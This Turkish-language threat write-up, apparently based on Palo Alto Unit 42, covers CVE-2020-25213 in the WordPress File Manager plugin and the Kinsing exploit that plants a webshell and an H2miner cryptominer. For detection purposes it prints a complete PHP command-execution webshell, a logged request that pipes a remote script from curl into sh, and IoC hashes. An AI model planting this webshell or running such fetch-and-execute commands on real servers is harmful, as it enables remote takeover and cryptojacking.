PaloAlto tarafından Aralık 2020’de yapılan bildirimde, WordPress File Manager Plugin’de dosya yükleme zaafiyeti olarak bilinen CVE-2020-25213 kodlu exploit paylaşılmıştı. Bu açıklık başarılı şekilde exploit edildiğinde, herhangi bir dosya, herhangi bir isim ve uzantıyla karşı web sunucusuna yüklenebilmektedir. Bunun sonucu olarak RCE (Remote Code Execution) mümkün hale gelmektedir.
Kinsign adıyla bilinen exploit, bu açıklığı kullanarak webshell yüklemektedir. H2miner ailesine ait bir cryptominer çalıştırmak için kullanılan exploit Golang programlama diline dayanmaktadır.
CVE-2020-2513 ve Webshell İlişkisi
Bu açıklık, WordPress File Manager Plugin üstünde yer alan elFinder kütüphanesi içindeki “connector.minimal.php.dist” dosyasının uzantısının “.php” olarak dönüştürülüp dosyanın çalıştırılmasına dayanmaktadır. Herhangi bir kısıtlama veya engellemeye takılmadan web sunucusu üstünde isteyen her kişi bunu gerçekleştirebilmektedir. Sunucuya herhangi bir yetki kontrolü olmaksızın dosya yüklenebilmesine neden olmaktadır.
- Şüpheli web sunucusu logu:
[19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36”
- Post isteğinin sonrasında çalıştırılan komut ile yüklenen dosya:
[19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411
- Çalıştırılan webshell kodu:
<?php if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “</pre>”; die; }?>
IoC Listesi
Kinsign Hash Değerleri:
- 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
- 5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889
Cryptominer Hash Değeri:
- dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839
Shell Script Hash Değeri:
- a68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62
WebShell Hash Değeri:
- f1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794
Kaynak
https://unit42.paloaltonetworks.com/cve-2020-25213/